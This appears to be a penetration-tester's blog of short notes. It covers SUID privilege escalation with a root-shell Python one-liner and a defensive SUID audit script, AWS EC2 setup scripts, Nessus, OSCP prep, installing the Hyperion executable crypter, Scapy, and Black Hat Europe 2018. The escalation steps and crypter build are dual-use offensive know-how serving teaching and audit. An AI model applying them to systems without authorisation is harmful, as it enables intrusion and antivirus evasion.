Searching for binaries for privilege escalation exploit

During the attack phase of a penetration test, once shell access has been gained, we can try to take over the system through a privilege escalation exploit in order to obtain root access. First we check which user the shell is running as, using the id command:

$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then we can use the following command to list the executable files on the system that have the SUID permission bit set:

find / -perm -u=s -type f 2>/dev/null

Here, the find command searches from the root directory (/) for files whose set-user-ID bit is set (-perm -u=s), restricted to regular files rather than directories (-type f). Error messages such as permission denied are written to standard error, which is redirected to the null device to suppress them (2>/dev/null).

Example shown below:

$ find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount

Note that if standard output (> or 1>) were redirected instead of standard error (2>), we would still see a list of permission denied errors. From the above listing, the Python 2.7 binary has the SUID bit set, so we could look to use it in an attempt to gain root access through a privilege escalation exploit. We can use the following command to achieve this with the above example:

/usr/bin/python2.7 -c 'import pty;pty.spawn("/bin/sh")'

This command obtains a TTY shell using Python 2.7, as is commonly done after a reverse shell connection. Because the binary is SUID root, this should result in the system granting root access, which can be seen from the following commands:

# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root

We can see that the user now has root access, denoted above by euid=0(root) and by the output of the whoami command.
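From the defender's side, the same find output can be compared against a known-good baseline so that an unexpected SUID binary, such as an interpreter, is reported rather than overlooked. This is an added example and not part of the original post; the baseline is assumed (the listing above minus the two interpreters) and in practice should be captured from a trusted, freshly installed host.

```bash
#!/bin/bash
# Added example (not from the original post): report SUID binaries that are
# absent from a known-good baseline. The baseline is an assumption for this
# example; build yours from a trusted, freshly installed host.
BASELINE="/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount"

# Read paths from stdin, one per line, and print those not in the baseline.
suid_unexpected() {
    local path
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$BASELINE" | grep -qxF -e "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Audit the running host: the same find as above, permission errors discarded.
suid_audit_host() {
    find / -perm -u=s -type f 2>/dev/null | suid_unexpected
}

# Constructed sample: a subset of the listing above, including two interpreters
# that have no business carrying the SUID bit.
SAMPLE="/sbin/mount.nfs
/usr/bin/python2.7
/usr/bin/mawk
/usr/bin/passwd
/bin/su"

# Prints /usr/bin/python2.7 and /usr/bin/mawk, one per line.
printf '%s\n' "$SAMPLE" | suid_unexpected
```

Run suid_audit_host on the real machine to check the live filesystem; any path it prints deserves a look at who set the bit and why.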

Amazon AWS VPC Components

Amazon AWS VPC consists of the following components:

  1. Internet Gateways or Virtual Private Gateways (note that a VPC can have only one Internet Gateway)
  2. Route Tables
  3. Network Access Control Lists (NACLs), applied at the subnet level and stateless
  4. Security Groups, applied at the instance level and stateful
  5. VPC Flow Logs, which record VPC traffic

Example bash script for cloud environments

The following bash script example can be used to automate some basic tasks associated with setting up a virtual resource, such as an Amazon AWS EC2 instance:

#!/bin/bash
# Update the installed packages
yum update -y
# Install the Apache web server
yum install httpd -y
# Start Apache now and enable it at boot
service httpd start
chkconfig httpd on
# Copy the site content from the S3 bucket into the web root
aws s3 cp s3:///index.html /var/www/html/

This bash script updates the instance's package repositories (yum update) and installs the Apache web server (yum install httpd). This particular script was used in Amazon AWS for an EC2 instance, with a static website hosted on an S3 bucket storage resource.

The script also ensures that the Apache web server persists across system reboots (chkconfig), and the last instruction copies the website content from the S3 bucket to the web root.
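A hardened variant of that script, as an added example that is not part of the original post: it stops at the first failure instead of carrying on, refuses an S3 URI whose bucket name is empty (the s3:/// form above would otherwise fail and leave the default Apache page being served), and checks that the page actually arrived. The bucket name is a placeholder.

```bash
#!/bin/bash
# Added example, not the original post's script. Same tasks as above, but the
# script aborts on the first error instead of continuing with a broken setup.
set -eu

# Placeholder bucket name: replace with your own bucket.
SITE_URI="s3://EXAMPLE-BUCKET-NAME/index.html"
WEB_ROOT="/var/www/html"

# Return 0 only for an S3 object URI with a non-empty bucket and key.
# Without such a check (and without set -e) a bad URI like s3:///index.html
# makes the copy fail while the rest of the script carries on regardless.
s3_uri_valid() {
    case "$1" in
        s3://*/*)
            local rest="${1#s3://}"
            local bucket="${rest%%/*}"
            local key="${rest#*/}"
            [ -n "$bucket" ] && [ -n "$key" ]
            ;;
        *) return 1 ;;
    esac
}

# Provision the host: packages, Apache, persistence across reboots, content.
provision_web_host() {
    s3_uri_valid "$SITE_URI" || { echo "bad S3 URI: $SITE_URI" >&2; return 1; }
    yum update -y
    yum install httpd -y
    service httpd start
    chkconfig httpd on
    aws s3 cp "$SITE_URI" "$WEB_ROOT/"
    # Verify the copy produced a non-empty page before declaring success.
    [ -s "$WEB_ROOT/index.html" ] || { echo "index.html missing" >&2; return 1; }
}

# Only provision when explicitly asked (e.g. from EC2 user data: script --run),
# so that sourcing the file for its functions has no side effects.
if [ "${1:-}" = "--run" ]; then
    provision_web_host
fi
```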

List of Tenable Nessus plugins

AIX Local Security Checks
Amazon Linux Local Security Checks
Backdoors
Brute force attacks
CentOS Local Security Checks
CGI abuses
CGI abuses : XSS
CISCO
Databases
Debian Local Security Checks
Default Unix Accounts
Denial of Service
DNS
F5 Networks Local Security Checks
Fedora Local Security Checks
Firewalls
FreeBSD Local Security Checks
FTP
Gain a shell remotely
General
Gentoo Local Security Checks
HP-UX Local Security Checks
Huawei Local Security Checks
Incident Response
Junos Local Security Checks
MacOS X Local Security Checks
Mandriva Local Security Checks
Misc.
Netware
Oracle Linux Local Security Checks
OracleVM Local Security Checks
Palo Alto Local Security Checks
Peer-To-Peer File Sharing
PhotonOS Local Security Checks
Red Hat Local Security Checks
RPC
SCADA
Scientific Linux Local Security Checks
Service detection
Settings
Slackware Local Security Checks
SMTP problems
SNMP
Solaris Local Security Checks
SuSE Local Security Checks
Ubuntu Local Security Checks
Virtuozzo Local Security Checks
VMware ESX Local Security Checks
Web Servers
Windows
Windows : Microsoft Bulletins
Windows : User management

Fix “Could not validate this preference file” in Nessus

If you receive the error message below when downloading the latest Nessus plugin updates, the following fix may help:

/opt/nessus/sbin/nessuscli update --plugins-only

----- Fetching the newest updates from nessus.org -----

Could not validate this preference file. Have installation files been copied from another system?
Nessus Plugins: Failed

The first step to fix the error is to request a new activation code from Tenable for Nessus: Link.

Then register the new activation code, received by email, and associate it with Nessus:

/opt/nessus/sbin/nessuscli fetch --register

Alien Vault – How to Prepare to Take the OSCP

Offensive Security Certified Professional (OSCP) – the most recognized penetration testing certification in the industry.

  1. Earned after passing the 24-hour performance-based exam
  2. Pre-requisite course: Penetration Testing with Kali Linux (PWK)
  3. The certification proves you have a clear and practical understanding of the penetration testing process and life-cycle
  4. The course lab is a virtual network containing targets of varying configurations and operating systems
  5. An OSCP is able to identify vulnerabilities and execute attacks in a controlled and focused manner

Alien Vault – How to Prepare to Take the OSCP: Link

How to install Hyperion in Linux

Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation based on the paper “Hyperion: Implementation of a PE-Crypter”.

Hyperion is not included in the Kali Linux repositories. To install Hyperion on Linux, run the following commands:

Download the files from Github:
wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip

Unzip the archive file:
unzip Hyperion-1.2.zip

Invoke the MinGW compiler to compile Hyperion into an executable file:
i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe

How to install the MinGW C compiler in Linux

MinGW, a contraction of “Minimalist GNU for Windows”, is a minimalist development environment for native Microsoft Windows applications.

MinGW provides a complete open source programming tool set which is suitable for the development of native MS-Windows applications, and which does not depend on any 3rd-party C runtime DLLs. (It does depend on a number of DLLs provided by Microsoft themselves, as components of the operating system; most notable among these is MSVCRT.DLL, the Microsoft C runtime library. Additionally, threaded applications must ship with a freely distributable thread support DLL, provided as part of MinGW itself.)

The MinGW compiler is included in the Kali Linux repositories but is not installed by default. To install the MinGW C compiler on Linux, run the following command:

apt-get install mingw-w64

MinGW (mingw-w64) is the successor to mingw32.

Using Scapy (Python packet manipulation program)

Scapy is a Python program that enables the user to send, sniff, dissect and forge network packets. This capability allows the construction of tools that can probe, scan or attack networks.

In other words, Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump and tshark.

Online guidance for using Scapy can be found here: Link

Black Hat Europe 2018

Black Hat Europe 2018, at ExCeL London
3rd – 6th December 2018

Address: Royal Victoria Dock, 1 Western Gateway, London E16 1XL (map: Directions)

Site link: Black Hat Europe 2018

Black Hat provides attendees with the very latest in research, development, and trends in Information Security. Here the brightest professionals and researchers in the industry will come together for a total of four days—two or four days of deeply technical hands-on Trainings, followed by two days of the latest research and vulnerability disclosures in the Briefings.

For the list of training events, see link here: Training